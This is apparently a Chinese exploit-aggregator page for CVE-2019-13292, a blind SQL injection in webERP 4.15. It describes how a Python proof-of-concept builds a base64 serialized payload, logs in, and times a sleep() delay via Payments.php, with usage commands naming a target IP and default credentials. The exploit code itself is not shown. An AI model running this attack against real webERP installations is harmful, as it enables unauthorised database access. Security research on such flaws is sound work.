关联漏洞
标题:
webERP SQL注入漏洞
(CVE-2019-13292)
描述:webERP是一套开源的进销存与财务管理系统(ERP系统)。该系统支持库存管理、权限角色管理、订单管理和财务管理等。 webERP 4.15版本中存在SQL注入漏洞。该漏洞源于基于数据库的应用缺少对外部输入SQL语句的验证。攻击者可利用该漏洞执行非法SQL命令。
描述
This is a Python3 script that demonstrates an exploit for a Blind SQL Injection vulnerability in WebERP version 4.15.
介绍
# Blind SQL Injection Exploit for WebERP
This is a Python3 script that demonstrates an exploit for a Blind SQL Injection vulnerability in WebERP version 4.15, initially discovered by Semen Alexandrovich Lyhin on June 10, 2019. The original exploit can be found [here](https://www.exploit-db.com/exploits/47013), and further details regarding the WebERP system can be obtained from the official WebERP website.
Overview
## Overview
The vulnerability lies in the way WebERP handles queries received in base64 encoding and passed to the unserialize() function. Notably, the script can deserialize these queries into an array without any sanitization. After that, each element of this array is fed directly into the SQL query without further checks, leaving the system prone to SQL injection attacks.
Script Operation
## This Script
This script works by exploiting the above vulnerability in the following steps:
A malicious query is prepared using the generatePayload() function. The function designs a serialized array with SQL injection payloads and encodes it into base64 format.
The script logs in to the WebERP system using the provided credentials and the getCookies() function, which retrieves session cookies.
A new supplier is added to the system using the addSupplierID() function. The supplier's name is used later as a marker to identify the system's response.
The exploit is executed using the runExploit() function. It sends a POST request to the "Payments.php" page of the WebERP system. This function embeds the base64 encoded payload as a parameter in the POST data.
The response time to the request is measured. A significantly longer response time suggests that the SQL query was delayed due to the injected sleep() command, confirming the presence of the SQL injection vulnerability.
## Usage
```python
python3 exploit.py <target> <path> <login> <password> <order>
```
Replace `<target>`, `<path>`, `<login>`, `<password>`, and `<order>` with your target IP address, target path, user login, user password, and company order respectively.
Example:
```python
python exploit.py 192.168.1.1 'WEBerp/' admin weberp 1
```
文件快照
[4.0K] /data/pocs/e97acfc42b3dcc5341f8c776c0929fd9bace72a9
├── [3.5K] exploit.py
└── [2.1K] README.md
0 directories, 2 files
备注
1. 建议优先通过来源进行访问。
2. 如果因为来源失效或无法访问,请发送邮箱到 f.jinxu#gmail.com 索取本地快照(把 # 换成 @)。
3. 神龙已为您对POC代码进行快照,为了长期维护,请考虑为本地POC付费,感谢您的支持。